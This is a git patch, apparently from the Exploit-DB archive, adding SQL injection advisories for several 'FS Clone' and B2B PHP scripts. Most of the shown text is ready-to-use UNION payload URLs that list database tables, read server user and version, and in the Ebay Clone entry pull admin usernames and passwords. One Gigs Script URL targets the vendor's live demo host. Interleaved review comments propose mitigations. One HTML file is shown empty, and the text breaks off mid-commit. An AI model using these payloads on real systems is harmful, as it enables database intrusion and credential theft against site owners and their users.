From 97b5f8cc5bbafbac383c58f2e358f146d8041bfe Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sun, 10 Dec 2017 05:02:21 +0000 Subject: [PATCH] DB: 2017-12-10 20 changes to exploits/shellcodes FS Makemytrip Clone 1.0 - 'fl_orig' / 'fl_dest' SQL Injection FS Linkedin Clone 1.0 - 'grid' / 'fid' / 'id' SQL Injection FS Indiamart Clone 1.0 - 'token' / 'id' / 'c' SQL Injection FS IMDB Clone 1.0 - 'f' / 's' / 'id' SQL Injection FS Grubhub Clone 1.0 - 'keywords' SQL Injection FS Groupon Clone 1.0 - 'id' SQL Injection FS Gigs Script 1.0 - 'cat' / 'sc' SQL Injection FS Freelancer Clone 1.0 - 'profile.php?u' SQL Injection FS Ebay Clone 1.0 - 'id' / 'sub_category_id' / 'category_id' SQL Injection FS Crowdfunding Script 1.0 - 'latest_news_details.php?id' SQL Injection FS Care Clone 1.0 - 'jobFrequency' / 'jobType' SQL Injection FS Amazon Clone 1.0 - SQL Injection FS Trademe Clone 1.0 - 'search' / 'id' SQL Injection FS Expedia Clone 1.0 - 'fl_orig' / 'fl_dest' / 'id' SQL Injection FS Foodpanda Clone 1.0 - SQL Injection Advance B2B Script 2.1.3 - 'show_id' / 'pid' SQL Injection Advance Online Learning Management Script 3.1 - 'subcatid' / 'popcourseid' SQL Injection Affiliate MLM Script 1.0 - 'product-category.php?key' SQL Injection Basic B2B Script 2.0.8 - 'product_details.php?id' SQL Injection Beauty Parlour Booking Script 1.0 - 'gender' / 'city' SQL Injection --- exploits/php/webapps/43246.txt | 36 ++++++++++++++++++++ exploits/php/webapps/43249.txt | 43 ++++++++++++++++++++++++ exploits/php/webapps/43250.txt | 43 ++++++++++++++++++++++++ exploits/php/webapps/43251.txt | 43 ++++++++++++++++++++++++ exploits/php/webapps/43252.html | 30 +++++++++++++++++ exploits/php/webapps/43253.txt | 36 ++++++++++++++++++++ exploits/php/webapps/43254.txt | 43 ++++++++++++++++++++++++ exploits/php/webapps/43255.txt | 29 +++++++++++++++++ exploits/php/webapps/43256.txt | 43 ++++++++++++++++++++++++ exploits/php/webapps/43257.txt | 29 +++++++++++++++++ exploits/php/webapps/43258.txt | 25 ++++++++++++++ exploits/php/webapps/43259.txt | 29 +++++++++++++++++ 
exploits/php/webapps/43260.txt | 36 ++++++++++++++++++++ exploits/php/webapps/43261.txt | 46 ++++++++++++++++++++++++++ exploits/php/webapps/43262.html | 30 +++++++++++++++++ exploits/php/webapps/43263.txt | 58 +++++++++++++++++++++++++++++++++ exploits/php/webapps/43264.txt | 54 ++++++++++++++++++++++++++++++ exploits/php/webapps/43265.txt | 30 +++++++++++++++++ exploits/php/webapps/43266.txt | 28 ++++++++++++++++ exploits/php/webapps/43267.txt | 36 ++++++++++++++++++++ files_exploits.csv | 20 ++++++++++++ 21 files changed, 767 insertions(+) create mode 100644 exploits/php/webapps/43246.txt create mode 100644 exploits/php/webapps/43249.txt create mode 100644 exploits/php/webapps/43250.txt create mode 100644 exploits/php/webapps/43251.txt create mode 100644 exploits/php/webapps/43252.html create mode 100644 exploits/php/webapps/43253.txt create mode 100644 exploits/php/webapps/43254.txt create mode 100644 exploits/php/webapps/43255.txt create mode 100644 exploits/php/webapps/43256.txt create mode 100644 exploits/php/webapps/43257.txt create mode 100644 exploits/php/webapps/43258.txt create mode 100644 exploits/php/webapps/43259.txt create mode 100644 exploits/php/webapps/43260.txt create mode 100644 exploits/php/webapps/43261.txt create mode 100644 exploits/php/webapps/43262.html create mode 100644 exploits/php/webapps/43263.txt create mode 100644 exploits/php/webapps/43264.txt create mode 100644 exploits/php/webapps/43265.txt create mode 100644 exploits/php/webapps/43266.txt create mode 100644 exploits/php/webapps/43267.txt diff --git a/exploits/php/webapps/43246.txt b/exploits/php/webapps/43246.txt new file mode 100644 index 000000000..f086f02b8 --- /dev/null +++ b/exploits/php/webapps/43246.txt 
@@ -0,0 +1,36 @@
+# # # # #
+# Exploit Title: FS Makemytrip Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/makemytrip-clone/
+# Demo: http://makemytrip-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/show-flight-result.php?&fl_orig=[SQL]
+#
+# 27'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(25),(26),(27),(28))--+-
+#
+# http://server/show-flight-result.php?&fl_orig=27'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(25),(26),(27),(28))--+-
+#
+# 2)
+# http://localhost/[PATH]/show-flight-result.php?fl_dest=[SQL]
+#
+# 27'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(25),(26),(27),(28))--+-
+#
+# http://server/show-flight-result.php?fl_dest=27'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(25),(26),(27),(28))--+-
+#
+# # # # #
\ No newline at end of file
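Review bot: The `# Description:` block in 43246.txt says only that SQL commands can be injected and gives no impact or remediation line, so a defender learns the affected inputs (`fl_orig` and `fl_dest` on show-flight-result.php) but not what to change. I would add `# Mitigation: bind fl_orig and fl_dest as parameters of a prepared statement; presumably they are concatenated into the query today` and, because the proof of concept reads INFORMATION_SCHEMA, `# Detection: review web server logs for UNION / INFORMATION_SCHEMA in these query-string parameters`. The same boilerplate description is used by the other advisories this commit adds (43249 through 43267), and the same two lines apply there with the parameter names changed. The first request also carries a stray `&` in `?&fl_orig=`, which looks like a typo.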
diff --git a/exploits/php/webapps/43249.txt b/exploits/php/webapps/43249.txt
new file mode 100644
index 000000000..3a3d3bbd3
--- /dev/null
+++ b/exploits/php/webapps/43249.txt
@@ -0,0 +1,43 @@ +# # # # # +# Exploit Title: FS Linkedin Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/linkedin-clone/ +# Demo: http://linkedin-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/group.php?grid=[SQL] +# +# -1'++UNION+ALL+SELECT+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),5,6,7,8,9,10,11,12,13,14--+- +# +# http://server/group.php?grid=-1'++UNION+ALL+SELECT+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),5,6,7,8,9,10,11,12,13,14--+- +# +# 2) +# http://localhost/[PATH]/profile.php?fid=[SQL] +# +# -44'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11))--+- +# +# http://server/profile.php?fid=-44'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11))--+- +# +# 3) +# http://localhost/[PATH]/company_details.php?id=[SQL] +# +# 
-9491e369853df766fa44e1ed0ff613f563bd'++UNION+ALL+SELECT+1,2,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),4,5,6,7--+- +# +# http://server/company_details.php?id=-9491e369853df766fa44e1ed0ff613f563bd'++UNION+ALL+SELECT+1,2,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),4,5,6,7--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43250.txt b/exploits/php/webapps/43250.txt new file mode 100644 index 000000000..9dd325a32 --- /dev/null +++ b/exploits/php/webapps/43250.txt 
@@ -0,0 +1,43 @@ +# # # # # +# Exploit Title: FS Indiamart Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/indiamart-clone/ +# Demo: http://indiamart-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/catcompany.php?token=[SQL] +# +# -7219b53b3a3d6ab90ce0268229151c9bde11'++UNION(SELECT(1),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(3),(4),(5),(6))--+- +# +# http://server/catcompany.php?token=-7219b53b3a3d6ab90ce0268229151c9bde11'++UNION(SELECT(1),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(3),(4),(5),(6))--+- +# +# 2) +# http://localhost/[PATH]/buyleads-details.php?id=[SQL] +# +# -9586c4ca4238a0b923820dcc509a6f75849b'++UNION(SELECT(1),(2),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47))--+- +# +# 
http://server/buyleads-details.php?id=-9586c4ca4238a0b923820dcc509a6f75849b'++UNION(SELECT(1),(2),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47))--+- +# +# 3) +# http://localhost/[PATH]/company/index.php?c=[SQL] +# +# -5471c4ca4238a0b923820dcc509a6f75849b'++UNION(SELECT(1),(2),(3),(4),(5),(6),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77))--+- +# +# http://server/company/index.php?c=-5471c4ca4238a0b923820dcc509a6f75849b'++UNION(SELECT(1),(2),(3),(4),(5),(6),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77))--+- +# +# # # # # \ No newline at end of file 
diff --git a/exploits/php/webapps/43251.txt b/exploits/php/webapps/43251.txt
new file mode 100644
index 000000000..5a8c83480
--- /dev/null
+++ b/exploits/php/webapps/43251.txt
@@ -0,0 +1,43 @@ +# # # # # +# Exploit Title: FS IMDB Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/imdb-clone/ +# Demo: http://imdb-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/movie.php?f=[SQL] +# +# -10++UNION(SELECT(1),(2),(3),(4),(5),(6),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34))--+- +# +# http://server/movie.php?f=-10++UNION(SELECT(1),(2),(3),(4),(5),(6),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34))--+- +# +# 2) +# http://localhost/[PATH]/tvshow.php?s=[SQL] +# +# -1++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18))--+- +# +# http://server/tvshow.php?s=-1++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18))--+- +# +# 3) +# http://localhost/[PATH]/show_misc_video.php?id=[SQL] +# +# 
-1++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8))--+- +# +# http://server/show_misc_video.php?id=-1++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8))--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43252.html b/exploits/php/webapps/43252.html new file mode 100644 index 000000000..fe93106e7 --- /dev/null +++ b/exploits/php/webapps/43252.html @@ -0,0 +1,30 @@ + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43253.txt b/exploits/php/webapps/43253.txt new file mode 100644 index 000000000..2fb0847b0 --- /dev/null +++ b/exploits/php/webapps/43253.txt @@ -0,0 +1,36 @@ +# # # # # +# Exploit Title: FS Groupon Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/groupon-clone/ +# Demo: http://groupon-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/item_details.php?id=[SQL] +# +# -1++UNION+ALL+SELECT+1,2,3,4,5,6,7,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),9,10,11,12,13,14,15,16,17--+- +# +# http://server/item_details.php?id=-1++UNION+ALL+SELECT+1,2,3,4,5,6,7,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),9,10,11,12,13,14,15,16,17--+- +# +# 2) +# http://localhost/[PATH]/vendor_details.php?id=[SQL] +# +# -2++UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),5,6,7,8,9,10,11,12,13,14,15--+- +# +# http://server/vendor_details.php?id=-2++UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),5,6,7,8,9,10,11,12,13,14,15--+- +# +# # # # # \ No newline at end of file 
diff --git a/exploits/php/webapps/43254.txt b/exploits/php/webapps/43254.txt
new file mode 100644
index 000000000..6dc6edf6f
--- /dev/null
+++ b/exploits/php/webapps/43254.txt
@@ -0,0 +1,43 @@ +# # # # # +# Exploit Title: FS Gigs Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/gigs-script/ +# Demo: http://gigs.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/browse-category.php?cat=[SQL] +# +# -83c4ca4238a0b923820dcc509a6f75849b'++/*!50000UNION*/+/*!50000SELECT*/+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5--+- +# +# http://server/browse-category.php?cat=-83c4ca4238a0b923820dcc509a6f75849b'++/*!50000UNION*/+/*!50000SELECT*/+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5--+- +# +# 2) +# http://localhost/[PATH]/browse-scategory.php?sc=[SQL] +# +# -53c81e728d9d4c2f636f067f89cc14862c'++UNION(SELECT(1),(2),(3),(4),(5),(6),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(8),(9),(10))--+- +# +# http://server/browse-scategory.php?sc=-53c81e728d9d4c2f636f067f89cc14862c'++UNION(SELECT(1),(2),(3),(4),(5),(6),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(8),(9),(10))--+- +# +# 3) +# http://localhost/[PATH]/service-provider.php?ser=[SQL] +# +# -1873'+UNION(SELECT(1),(2),(3),(4),(5),(6),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52))--+- +# +# 
http://gigs.demonstration.co.in/service-provider.php?ser=-1873'+UNION(SELECT(1),(2),(3),(4),(5),(6),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52))--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43255.txt b/exploits/php/webapps/43255.txt new file mode 100644 index 000000000..1997566c1 --- /dev/null +++ b/exploits/php/webapps/43255.txt @@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: FS Freelancer Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/freelancer-clone/ +# Demo: http://freelancer-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/profile.php?u=[SQL] +# +# -c4ca4238a0b923820dcc509a6f75849b'++UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--+- +# +# http://server/profile.php?u=-c4ca4238a0b923820dcc509a6f75849b'++UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43256.txt b/exploits/php/webapps/43256.txt new file mode 100644 index 000000000..da9c56a56 
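Review bot: The last example URL of item 3 in 43254.txt names the vendor's public demo host (`gigs.demonstration.co.in`) where items 1 and 2, and the other advisories in this commit, use the `http://server/` placeholder. The host should be replaced with `http://server/` so the entry does not embed a ready-made request against a third-party system. Item 3 also concerns a `ser` parameter on service-provider.php that the commit subject for this entry ('cat' / 'sc') does not list, so the title under-reports the affected inputs.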
--- /dev/null +++ b/exploits/php/webapps/43256.txt 
@@ -0,0 +1,43 @@ +# # # # # +# Exploit Title: FS Ebay Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/ebay-clone/ +# Demo: http://ebay-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/product.php?id=[SQL] +# +# -9++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20))--+- +# +# http://server/product.php?id=-9++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20))--+- +# +# 2) +# http://localhost/[PATH]/search.php?category_id=1&sub_category_id=[SQL] +# +# -1++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16))--+- +# +# http://server/search.php?category_id=1&sub_category_id=-1++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16))--+- +# +# 3) +# http://localhost/[PATH]/search.php?category_id=[SQL] +# +# -1++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(id,username,password+SEPARATOR+0x3c62723e)+FROM+admin),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16))--+- +# +# 
http://server/search.php?category_id=-1++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(id,username,password+SEPARATOR+0x3c62723e)+FROM+admin),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16))--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43257.txt b/exploits/php/webapps/43257.txt new file mode 100644 index 000000000..983ed073a --- /dev/null +++ b/exploits/php/webapps/43257.txt @@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: FS Crowdfunding Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/crowdfunding-script/ +# Demo: http://crowdfunding.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/latest_news_details.php?id=[SQL] +# +# -4'++UNION+ALL+SELECT+1,2,3,4,5,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+- +# +# http://server/latest_news_details.php?id=-4'++UNION+ALL+SELECT+1,2,3,4,5,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43258.txt b/exploits/php/webapps/43258.txt new file mode 100644 index 000000000..b856816c7 --- /dev/null +++ b/exploits/php/webapps/43258.txt 
